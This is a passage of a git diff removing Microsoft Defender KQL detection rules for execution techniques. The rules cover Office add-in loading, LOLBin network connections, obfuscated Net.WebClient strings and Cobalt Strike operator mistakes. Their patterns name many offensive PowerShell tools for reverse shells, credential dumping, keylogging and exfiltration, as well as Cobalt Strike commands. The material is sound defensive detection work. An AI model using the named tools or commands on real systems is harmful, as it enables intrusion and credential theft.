"\\Invoke-MITM6.ps1" or FolderPath endswith "\\Invoke-NanoDump.ps1" or FolderPath endswith "\\Invoke-NetRipper.ps1" or FolderPath endswith "\\Invoke-NetworkRelay.ps1" or FolderPath endswith "\\Invoke-NinjaCopy.ps1" or FolderPath endswith "\\Invoke-OxidResolver.ps1" or FolderPath endswith "\\Invoke-P0wnedshell.ps1" or FolderPath endswith "\\Invoke-P0wnedshellx86.ps1" or FolderPath endswith "\\Invoke-Paranoia.ps1" or FolderPath endswith "\\Invoke-PortScan.ps1" or FolderPath endswith "\\Invoke-PoshRatHttp.ps1" or FolderPath endswith "\\Invoke-PoshRatHttps.ps1" or FolderPath endswith "\\Invoke-PostExfil.ps1" or FolderPath endswith "\\Invoke-PowerDump.ps1" or FolderPath endswith "\\Invoke-PowerShellIcmp.ps1" or FolderPath endswith "\\Invoke-PowerShellTCP.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellTcpOneLineBind.ps1" or FolderPath endswith "\\Invoke-PowerShellUdp.ps1" or FolderPath endswith "\\Invoke-PowerShellUdpOneLine.ps1" or FolderPath endswith "\\Invoke-PowerShellWMI.ps1" or FolderPath endswith "\\Invoke-PowerThIEf.ps1" or FolderPath endswith "\\Invoke-PPLDump.ps1" or FolderPath endswith "\\Invoke-Prasadhak.ps1" or FolderPath endswith "\\Invoke-PsExec.ps1" or FolderPath endswith "\\Invoke-PsGcat.ps1" or FolderPath endswith "\\Invoke-PsGcatAgent.ps1" or FolderPath endswith "\\Invoke-PSInject.ps1" or FolderPath endswith "\\Invoke-PsUaCme.ps1" or FolderPath endswith "\\Invoke-ReflectivePEInjection.ps1" or FolderPath endswith "\\Invoke-ReverseDNSLookup.ps1" or FolderPath endswith "\\Invoke-Rubeus.ps1" or FolderPath endswith "\\Invoke-RunAs.ps1" or FolderPath endswith "\\Invoke-SafetyKatz.ps1" or FolderPath endswith "\\Invoke-SauronEye.ps1" or FolderPath endswith "\\Invoke-SCShell.ps1" or FolderPath endswith "\\Invoke-Seatbelt.ps1" or FolderPath endswith "\\Invoke-ServiceAbuse.ps1" or FolderPath endswith "\\Invoke-SessionGopher.ps1" or FolderPath endswith "\\Invoke-ShellCode.ps1" or FolderPath endswith 
"\\Invoke-SMBScanner.ps1" or FolderPath endswith "\\Invoke-Snaffler.ps1" or FolderPath endswith "\\Invoke-Spoolsample.ps1" or FolderPath endswith "\\Invoke-SSHCommand.ps1" or FolderPath endswith "\\Invoke-SSIDExfil.ps1" or FolderPath endswith "\\Invoke-StandIn.ps1" or FolderPath endswith "\\Invoke-StickyNotesExtract.ps1" or FolderPath endswith "\\Invoke-Tater.ps1" or FolderPath endswith "\\Invoke-Thunderfox.ps1" or FolderPath endswith "\\Invoke-ThunderStruck.ps1" or FolderPath endswith "\\Invoke-TokenManipulation.ps1" or FolderPath endswith "\\Invoke-Tokenvator.ps1" or FolderPath endswith "\\Invoke-TotalExec.ps1" or FolderPath endswith "\\Invoke-UrbanBishop.ps1" or FolderPath endswith "\\Invoke-UserHunter.ps1" or FolderPath endswith "\\Invoke-VoiceTroll.ps1" or FolderPath endswith "\\Invoke-Whisker.ps1" or FolderPath endswith "\\Invoke-WinEnum.ps1" or FolderPath endswith "\\Invoke-winPEAS.ps1" or FolderPath endswith "\\Invoke-WireTap.ps1" or FolderPath endswith "\\Invoke-WmiCommand.ps1" or FolderPath endswith "\\Invoke-WScriptBypassUAC.ps1" or FolderPath endswith "\\Invoke-Zerologon.ps1" or FolderPath endswith "\\Keylogger.ps1" or FolderPath endswith "\\MailRaider.ps1" or FolderPath endswith "\\New-HoneyHash.ps1" or FolderPath endswith "\\OfficeMemScraper.ps1" or FolderPath endswith "\\Offline_Winpwn.ps1" or FolderPath endswith "\\Out-CHM.ps1" or FolderPath endswith "\\Out-DnsTxt.ps1" or FolderPath endswith "\\Out-Excel.ps1" or FolderPath endswith "\\Out-HTA.ps1" or FolderPath endswith "\\Out-Java.ps1" or FolderPath endswith "\\Out-JS.ps1" or FolderPath endswith "\\Out-Minidump.ps1" or FolderPath endswith "\\Out-RundllCommand.ps1" or FolderPath endswith "\\Out-SCF.ps1" or FolderPath endswith "\\Out-SCT.ps1" or FolderPath endswith "\\Out-Shortcut.ps1" or FolderPath endswith "\\Out-WebQuery.ps1" or FolderPath endswith "\\Out-Word.ps1" or FolderPath endswith "\\Parse_Keys.ps1" or FolderPath endswith "\\Port-Scan.ps1" or FolderPath endswith "\\PowerBreach.ps1" or 
FolderPath endswith "\\powercat.ps1" or FolderPath endswith "\\Powermad.ps1" or FolderPath endswith "\\PowerRunAsSystem.psm1" or FolderPath endswith "\\PowerSharpPack.ps1" or FolderPath endswith "\\PowerUp.ps1" or FolderPath endswith "\\PowerUpSQL.ps1" or FolderPath endswith "\\PowerView.ps1" or FolderPath endswith "\\PSAsyncShell.ps1" or FolderPath endswith "\\RemoteHashRetrieval.ps1" or FolderPath endswith "\\Remove-Persistence.ps1" or FolderPath endswith "\\Remove-PoshRat.ps1" or FolderPath endswith "\\Remove-Update.ps1" or FolderPath endswith "\\Run-EXEonRemote.ps1" or FolderPath endswith "\\Schtasks-Backdoor.ps1" or FolderPath endswith "\\Set-DCShadowPermissions.ps1" or FolderPath endswith "\\Set-MacAttribute.ps1" or FolderPath endswith "\\Set-RemotePSRemoting.ps1" or FolderPath endswith "\\Set-RemoteWMI.ps1" or FolderPath endswith "\\Set-Wallpaper.ps1" or FolderPath endswith "\\Show-TargetScreen.ps1" or FolderPath endswith "\\Speak.ps1" or FolderPath endswith "\\Start-CaptureServer.ps1" or FolderPath endswith "\\Start-WebcamRecorder.ps1" or FolderPath endswith "\\StringToBase64.ps1" or FolderPath endswith "\\TexttoExe.ps1" or FolderPath endswith "\\VolumeShadowCopyTools.ps1" or FolderPath endswith "\\WinPwn.ps1" or FolderPath endswith "\\WSUSpendu.ps1") or (FolderPath contains "Invoke-Sharp" and FolderPath endswith ".ps1") \ No newline at end of file diff --git a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql b/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql deleted file mode 100644 index 856b527b..00000000 --- a/Execution/Microsoft_Excel_Add-In_Loaded_From_Uncommon_Location.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/12 -// Level: medium -// Description: Detects Microsoft Excel loading an Add-In (.xll) file from an uncommon location -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where (FolderPath contains "\\Desktop\\" or FolderPath contains "\\Downloads\\" or FolderPath contains "\\Perflogs\\" or FolderPath contains "\\Temp\\" or FolderPath contains "\\Users\\Public\\" or FolderPath contains "\\Windows\\Tasks\\") and FolderPath endswith ".xll" and InitiatingProcessFolderPath endswith "\\excel.exe" \ No newline at end of file diff --git a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql b/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql deleted file mode 100644 index 49fbaa43..00000000 --- a/Execution/Microsoft_Sync_Center_Suspicious_Network_Connections.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: elhoim -// Date: 2022/04/28 -// Level: medium -// Description: Detects suspicious connections from Microsoft Sync Center to non-private IPs. -// Tags: attack.t1055, attack.t1218, attack.execution, attack.defense_evasion -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\mobsync.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")))) \ No newline at end of file diff --git a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql b/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql deleted file mode 100644 index ec2bd99f..00000000 --- a/Execution/Microsoft_VBA_For_Outlook_Addin_Loaded_Via_Outlook.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: medium -// Description: Detects outlvba (Microsoft VBA for Outlook Addin) DLL being loaded by the outlook process -// Tags: attack.execution, attack.t1204.002 -DeviceImageLoadEvents -| where FolderPath endswith "\\outlvba.dll" and InitiatingProcessFolderPath endswith "\\outlook.exe" \ No newline at end of file diff --git a/Execution/Microsoft_Workflow_Compiler_Execution.kql b/Execution/Microsoft_Workflow_Compiler_Execution.kql deleted file mode 100644 index fc3958d8..00000000 --- a/Execution/Microsoft_Workflow_Compiler_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nik Seetharaman, frack113 -// Date: 2019/01/16 -// Level: medium -// Description: Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code. -// Tags: attack.defense_evasion, attack.execution, attack.t1127, attack.t1218 -DeviceProcessEvents -| where FolderPath endswith "\\Microsoft.Workflow.Compiler.exe" or ProcessVersionInfoOriginalFileName =~ "Microsoft.Workflow.Compiler.exe" \ No newline at end of file diff --git a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql b/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql deleted file mode 100644 index 3f152c7d..00000000 --- a/Execution/Mshtml.DLL_RunHTMLApplication_Suspicious_Usage.kql +++ /dev/null 
@@ -1,8 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems), Florian Roth (Nextron Systems), Josh Nickels, frack113, Zaw Min Htun (ZETA) -// Date: 2022/08/14 -// Level: high -// Description: Detects execution of commands that leverage the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, http...) - -// Tags: attack.defense_evasion, attack.execution -DeviceProcessEvents -| where (ProcessCommandLine contains "#135" or ProcessCommandLine contains "RunHTMLApplication") and (ProcessCommandLine contains "\\..\\" and ProcessCommandLine contains "mshtml") \ No newline at end of file diff --git a/Execution/Net_WebClient_Casing_Anomalies.kql b/Execution/Net_WebClient_Casing_Anomalies.kql deleted file mode 100644 index f0456bb4..00000000 --- a/Execution/Net_WebClient_Casing_Anomalies.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/05/24 -// Level: high -// Description: Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "TgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAEIA" or ProcessCommandLine contains "OAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBlAGIA" or ProcessCommandLine contains 
"uAEUAVAAuAFcAZQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "4AZQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBlAFQALgB3AEUAYg" or ProcessCommandLine contains "OAGUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAYg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBiA" or ProcessCommandLine contains "bgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAYg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAGIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBiA" or 
ProcessCommandLine contains "TgBFAFQALgBXAEUAYg" or ProcessCommandLine contains "OAEUAVAAuAFcARQBiA" or ProcessCommandLine contains "bgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "4AZQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgB3AGUAQg" or ProcessCommandLine contains "OAGUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AGUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAGUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAGUAQg" or ProcessCommandLine 
contains "4ARQBUAC4AVwBlAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "TgBFAFQALgBXAGUAQg" or ProcessCommandLine contains "OAEUAVAAuAFcAZQBCA" or ProcessCommandLine contains "bgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "4AZQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgB3AEUAQg" or ProcessCommandLine contains "OAGUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "4ARQB0AC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAHQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAdAAuAHcARQBCA" or ProcessCommandLine contains "bgBlAFQALgB3AEUAQg" or ProcessCommandLine contains "uAGUAVAAuAHcARQBCA" or ProcessCommandLine contains "bgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "4ARQBUAC4AdwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBFAFQALgB3AEUAQg" or ProcessCommandLine contains "OAEUAVAAuAHcARQBCA" or ProcessCommandLine contains "TgBlAHQALgBXAEUAQg" or ProcessCommandLine contains "4AZQB0AC4AVwBFAEIA" or ProcessCommandLine contains "OAGUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "4ARQB0AC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "TgBFAHQALgBXAEUAQg" or ProcessCommandLine contains "OAEUAdAAuAFcARQBCA" or ProcessCommandLine contains "bgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "4AZQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "TgBlAFQALgBXAEUAQg" or ProcessCommandLine contains "OAGUAVAAuAFcARQBCA" or ProcessCommandLine contains "bgBFAFQALgBXAEUAQg" or ProcessCommandLine contains "4ARQBUAC4AVwBFAEIA" or ProcessCommandLine contains "uAEUAVAAuAFcARQBCA") and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or 
(ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql b/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql deleted file mode 100644 index 43a0fa9b..00000000 --- a/Execution/Network_Connection_Initiated_By_Eqnedt32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Max Altgelt (Nextron Systems) -// Date: 2022/04/14 -// Level: high -// Description: Detects network connections from the Equation Editor process "eqnedt32.exe". -// Tags: attack.execution, attack.t1203 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\eqnedt32.exe" \ No newline at end of file diff --git a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql b/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql deleted file mode 100644 index fece3237..00000000 --- a/Execution/Network_Connection_Initiated_By_Regsvr32.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Dmitriy Lifanov, oscd.community -// Date: 2019/10/25 -// Level: medium -// Description: Detects a network connection initiated by "Regsvr32.exe" -// Tags: attack.execution, attack.t1559.001, attack.defense_evasion, attack.t1218.010 -DeviceNetworkEvents -| where InitiatingProcessFolderPath endswith "\\regsvr32.exe" \ No newline at end of file diff --git a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql b/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql deleted file mode 100644 index 8e765072..00000000 --- a/Execution/Network_Connection_Initiated_Via_Notepad.EXE.kql +++ /dev/null 
@@ -1,10 +0,0 @@
-// Author: EagleEye Team
-// Date: 2020/05/14
-// Level: high
-// Description: Detects a network connection that is initiated by the "notepad.exe" process.
-This might be a sign of process injection from a beacon process or something similar.
-Notepad rarely initiates a network communication except when printing documents for example.
-
-// Tags: attack.command_and_control, attack.execution, attack.defense_evasion, attack.t1055
-DeviceNetworkEvents
-| where InitiatingProcessFolderPath endswith "\\notepad.exe" and (not(RemotePort == 9100))
\ No newline at end of file
diff --git a/Execution/New_Application_in_AppCompat.kql b/Execution/New_Application_in_AppCompat.kql
deleted file mode 100644
index 65adc423..00000000
--- a/Execution/New_Application_in_AppCompat.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)
-// Date: 2020/05/02
-// Level: informational
-// Description: A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.
-// Tags: attack.execution, attack.t1204.002
-DeviceRegistryEvents
-| where RegistryKey contains "\\AppCompatFlags\\Compatibility Assistant\\Store"
\ No newline at end of file
diff --git a/Execution/New_Process_Created_Via_Wmic.EXE.kql b/Execution/New_Process_Created_Via_Wmic.EXE.kql
deleted file mode 100644
index 77159755..00000000
--- a/Execution/New_Process_Created_Via_Wmic.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
-// Date: 2019/01/16
-// Level: medium
-// Description: Detects new process creation using WMIC via the "process call create" flag
-// Tags: attack.execution, attack.t1047, car.2016-03-002
-DeviceProcessEvents
-| where (ProcessCommandLine contains "process" and ProcessCommandLine contains "call" and ProcessCommandLine contains "create") and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe")
\ No newline at end of file
diff --git a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql b/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql
deleted file mode 100644
index d02933f8..00000000
--- a/Execution/New_Virtual_Smart_Card_Created_Via_TpmVscMgr.EXE.kql
+++ /dev/null
@@ -1,7 +0,0 @@
-// Author: Nasreddine Bencherchali (Nextron Systems)
-// Date: 2023/06/15
-// Level: medium
-// Description: Detects execution of "Tpmvscmgr.exe" to create a new virtual smart card.
-// Tags: attack.execution
-DeviceProcessEvents
-| where ProcessCommandLine contains "create" and (FolderPath endswith "\\tpmvscmgr.exe" and ProcessVersionInfoOriginalFileName =~ "TpmVscMgr.exe")
\ No newline at end of file
diff --git a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql b/Execution/Non_Interactive_PowerShell_Process_Spawned.kql
deleted file mode 100644
index f604fb6e..00000000
--- a/Execution/Non_Interactive_PowerShell_Process_Spawned.kql
+++ /dev/null
@@ -1,7 +0,0 @@ -// Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) -// Date: 2019/09/12 -// Level: low -// Description: Detects non-interactive PowerShell activity by looking at the "powershell" process with a non-user GUI process such as "explorer.exe" as a parent. -// Tags: attack.execution, attack.t1059.001 -DeviceProcessEvents -| where ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) and (not(((InitiatingProcessFolderPath endswith ":\\Windows\\explorer.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\System32\\CompatTelRunner.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\explorer.exe") or InitiatingProcessFolderPath =~ ":\\$WINDOWS.~BT\\Sources\\SetupHost.exe"))) and (not(((InitiatingProcessFolderPath contains ":\\Program Files\\WindowsApps\\Microsoft.WindowsTerminal_" and InitiatingProcessFolderPath endswith "\\WindowsTerminal.exe") or (InitiatingProcessCommandLine contains " --ms-enable-electron-run-as-node " and InitiatingProcessFolderPath endswith "\\AppData\\Local\\Programs\\Microsoft VS Code\\Code.exe")))) \ No newline at end of file diff --git a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql b/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql deleted file mode 100644 index 421decbc..00000000 --- a/Execution/Office_Application_Initiated_Network_Connection_To_Non-Local_IP.kql +++ /dev/null 
@@ -1,10 +0,0 @@ -// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton -// Date: 2021/11/10 -// Level: medium -// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses. -This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292. -This rule will require an initial baseline and tuning that is specific to your organization. - -// Tags: attack.execution, attack.t1203 -DeviceNetworkEvents -| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or (ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24"))))) \ No newline at end of file diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql deleted file mode 100644 index f62f88b2..00000000 --- a/Execution/Operator_Bloopers_Cobalt_Strike_Commands.kql +++ /dev/null 
@@ -1,7 +0,0 @@ -// Author: _pete_0, TheDFIRReport -// Date: 2022/05/06 -// Level: high -// Description: Detects use of Cobalt Strike commands accidentally entered in the CMD shell -// Tags: attack.execution, attack.t1059.003, stp.1u -DeviceProcessEvents -| where ((ProcessCommandLine contains "psinject" or ProcessCommandLine contains "spawnas" or ProcessCommandLine contains "make_token" or ProcessCommandLine contains "remote-exec" or ProcessCommandLine contains "rev2self" or ProcessCommandLine contains "dcsync" or ProcessCommandLine contains "logonpasswords" or ProcessCommandLine contains "execute-assembly" or ProcessCommandLine contains "getsystem") and (ProcessCommandLine startswith "cmd " or ProcessCommandLine startswith "cmd.exe" or ProcessCommandLine startswith "c:\\windows\\system32\\cmd.exe")) and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file diff --git a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql b/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql deleted file mode 100644 index ec317b49..00000000 --- a/Execution/Operator_Bloopers_Cobalt_Strike_Modules.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: _pete_0, TheDFIRReport -// Date: 2022/05/06 -// Level: high -// Description: Detects Cobalt Strike module/commands accidentally entered in CMD shell -// Tags: attack.execution, attack.t1059.003 -DeviceProcessEvents -| where (ProcessCommandLine contains "Invoke-UserHunter" or ProcessCommandLine contains "Invoke-ShareFinder" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-SMBAutoBrute" or ProcessCommandLine contains "Invoke-Nightmare" or ProcessCommandLine contains "zerologon" or ProcessCommandLine contains "av_query") and (ProcessVersionInfoOriginalFileName =~ "Cmd.Exe" or FolderPath endswith "\\cmd.exe") \ No newline at end of file 
